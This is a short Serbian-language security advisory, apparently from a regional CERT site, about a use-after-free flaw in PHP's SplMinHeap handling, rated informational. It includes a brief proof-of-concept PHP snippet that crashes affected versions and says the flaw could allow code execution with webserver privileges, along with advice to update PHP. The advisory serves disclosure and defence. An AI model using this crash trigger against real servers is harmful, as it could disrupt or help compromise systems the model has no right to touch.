PHP use-after-free ranjivost

High-Tech Bridge Security Research Lab otkrio je ranjivost programskog jezika PHP koja se može iskoristiti za crash i moguće izvršavanje proizvoljnog koda na sistemu. Ranjivost se nalazi u "spl_heap_object_free_storage()" funkciji kada se pokusa dereferencirati već oslobođena memorija. Lokalni napadač može prouzrokovati segmentation fault ili zvršiti kod na sistemu sa privilegijama webservera.

Primjer koda koji će izazvati kvar u problematičnim verzijama :

<?php
class SplMinHeap1 extends SplMinHeap {
  public function compare($a, $b)   {
    return -parent::notexist($a, $b);
  }
}
$h = new   SplMinHeap1();
$h->insert(1);
$h->insert(6);
$h->insert(5);
$h->insert(2);
?>

Ranjivost je testirana na Ubuntu 14.04.1, preporučuje se preuzimanje nove verzije PHPa.

Izvor:www.htbridge.com

Značaj ranjivosti:INFORMATIVNO

Platforma:Linux

CVE oznaka:N/A

PHP use-after-free ranjivost

PHP use-after-free ranjivost

Leave a Reply Cancel reply

MITRE CVE Twitter feed

CERTRS Kontakt informacije

Vlada republike srpske

Akademska istraživačka mreža republike srpske